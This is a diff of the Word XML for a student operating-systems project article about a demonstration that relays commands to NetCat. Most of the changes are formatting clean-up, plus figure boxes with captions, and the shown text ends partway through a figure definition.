--- a/OSproject_r1/IT154_Project_Article.docx
+++ b/OSproject_r1/IT154_Project_Article.docx
@@ -234,32 +234,14 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">, UDP, TCP, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>, UDP, TCP, NetCat, Command Line</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>NetCat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>, Command Line</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
         <w:t xml:space="preserve"> Interface, Command Language Interpreter</w:t>
       </w:r>
     </w:p>
@@ -668,7 +650,6 @@
         </w:rPr>
         <w:t xml:space="preserve">and </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -676,17 +657,7 @@
           <w:i/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>NetCat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:i/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>NetCat.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1032,7 +1003,6 @@
         </w:rPr>
         <w:t xml:space="preserve">In this demonstration, a client program acting as a bridge was used to relay commands to </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1042,7 +1012,6 @@
         </w:rPr>
         <w:t>netcat</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1087,7 +1056,6 @@
         <w:tab/>
         <w:t xml:space="preserve">Another application that was used in this simulation was </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1097,50 +1065,21 @@
         </w:rPr>
         <w:t>NetCat</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>Netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> is a multiplatform application is a small network utility that manages input and output of data in varying file types. [7] without writing to the filesystem of the host. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>NetCat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> allows files to be immediately transferred from one machine to another over the network rather than having to personally write to the source machine’s means of primary storage.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Netcat is a multiplatform application is a small network utility that manages input and output of data in varying file types. [7] without writing to the filesystem of the host. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>NetCat allows files to be immediately transferred from one machine to another over the network rather than having to personally write to the source machine’s means of primary storage.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1156,152 +1095,136 @@
           <w:bCs/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">It would also be quite important to note that as </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t>NetCat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> opens a port for listening to commands on the host machine, there is an increased probability of a threat or security risk.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:t>It would also be quite important to note that as NetCat opens a port for listening to commands on the host machine, there is an increased probability of a threat or security risk.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -1336,45 +1259,4375 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:firstLine="720"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="60C40203" wp14:editId="71027366">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:align>center</wp:align>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>477486</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="5443855" cy="3115945"/>
+                <wp:effectExtent l="0" t="0" r="17145" b="27305"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="217" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5443855" cy="3116179"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:schemeClr val="bg1"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:noProof/>
+                              </w:rPr>
+                              <w:drawing>
+                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40B8BDFC" wp14:editId="73821085">
+                                  <wp:extent cx="5252085" cy="2748915"/>
+                                  <wp:effectExtent l="0" t="0" r="5715" b="0"/>
+                                  <wp:docPr id="42" name="Picture 42"/>
+                                  <wp:cNvGraphicFramePr>
+                                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                                  </wp:cNvGraphicFramePr>
+                                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                        <pic:nvPicPr>
+                                          <pic:cNvPr id="0" name="Picture 2"/>
+                                          <pic:cNvPicPr>
+                                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                          </pic:cNvPicPr>
+                                        </pic:nvPicPr>
+                                        <pic:blipFill>
+                                          <a:blip r:embed="rId8">
+                                            <a:extLst>
+                                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                              </a:ext>
+                                            </a:extLst>
+                                          </a:blip>
+                                          <a:srcRect/>
+                                          <a:stretch>
+                                            <a:fillRect/>
+                                          </a:stretch>
+                                        </pic:blipFill>
+                                        <pic:spPr bwMode="auto">
+                                          <a:xfrm>
+                                            <a:off x="0" y="0"/>
+                                            <a:ext cx="5252085" cy="2748915"/>
+                                          </a:xfrm>
+                                          <a:prstGeom prst="rect">
+                                            <a:avLst/>
+                                          </a:prstGeom>
+                                          <a:noFill/>
+                                          <a:ln>
+                                            <a:noFill/>
+                                          </a:ln>
+                                        </pic:spPr>
+                                      </pic:pic>
+                                    </a:graphicData>
+                                  </a:graphic>
+                                </wp:inline>
+                              </w:drawing>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:b/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figure 1. The server </w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype w14:anchorId="60C40203" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                <v:stroke joinstyle="miter"/>
+                <v:path gradientshapeok="t" o:connecttype="rect"/>
+              </v:shapetype>
+              <v:shape id="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:37.6pt;width:428.65pt;height:245.35pt;z-index:251659264;visibility:visible;mso-wrap-style:none;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" strokecolor="white [3212]">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:noProof/>
+                        </w:rPr>
+                        <w:drawing>
+                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40B8BDFC" wp14:editId="73821085">
+                            <wp:extent cx="5252085" cy="2748915"/>
+                            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
+                            <wp:docPr id="42" name="Picture 42"/>
+                            <wp:cNvGraphicFramePr>
+                              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                            </wp:cNvGraphicFramePr>
+                            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                  <pic:nvPicPr>
+                                    <pic:cNvPr id="0" name="Picture 2"/>
+                                    <pic:cNvPicPr>
+                                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                    </pic:cNvPicPr>
+                                  </pic:nvPicPr>
+                                  <pic:blipFill>
+                                    <a:blip r:embed="rId8">
+                                      <a:extLst>
+                                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                        </a:ext>
+                                      </a:extLst>
+                                    </a:blip>
+                                    <a:srcRect/>
+                                    <a:stretch>
+                                      <a:fillRect/>
+                                    </a:stretch>
+                                  </pic:blipFill>
+                                  <pic:spPr bwMode="auto">
+                                    <a:xfrm>
+                                      <a:off x="0" y="0"/>
+                                      <a:ext cx="5252085" cy="2748915"/>
+                                    </a:xfrm>
+                                    <a:prstGeom prst="rect">
+                                      <a:avLst/>
+                                    </a:prstGeom>
+                                    <a:noFill/>
+                                    <a:ln>
+                                      <a:noFill/>
+                                    </a:ln>
+                                  </pic:spPr>
+                                </pic:pic>
+                              </a:graphicData>
+                            </a:graphic>
+                          </wp:inline>
+                        </w:drawing>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:jc w:val="center"/>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:b/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figure 1. The server </w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square" anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>Here, we discuss how the simulation will work. Along with commands that make the said program used in the demonstration function accordingly.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3CBEEE8C" wp14:editId="3DEB8D4C">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:align>right</wp:align>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>3951605</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="5443855" cy="3350260"/>
+                <wp:effectExtent l="0" t="0" r="17145" b="21590"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="3" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5443855" cy="3350260"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:schemeClr val="bg1"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:jc w:val="center"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:noProof/>
+                              </w:rPr>
+                              <w:drawing>
+                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67A517E9" wp14:editId="53AE60AF">
+                                  <wp:extent cx="5715000" cy="3013710"/>
+                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                                  <wp:docPr id="43" name="Picture 43"/>
+                                  <wp:cNvGraphicFramePr>
+                                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                                  </wp:cNvGraphicFramePr>
+                                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                                        <pic:nvPicPr>
+                                          <pic:cNvPr id="0" name="Picture 3"/>
+                                          <pic:cNvPicPr>
+                                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                                          </pic:cNvPicPr>
+                                        </pic:nvPicPr>
+                                        <pic:blipFill>
+                                          <a:blip r:embed="rId9">
+                                            <a:extLst>
+                                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                                              </a:ext>
+                                            </a:extLst>
+                                          </a:blip>
+                                          <a:srcRect/>
+                                          <a:stretch>
+                                            <a:fillRect/>
+                                          </a:stretch>
+                                        </pic:blipFill>
+                                        <pic:spPr bwMode="auto">
+                                          <a:xfrm>
+                                            <a:off x="0" y="0"/>
+                                            <a:ext cx="5715000" cy="3013710"/>
+                                          </a:xfrm>
+                                          <a:prstGeom prst="rect">
+                                            <a:avLst/>
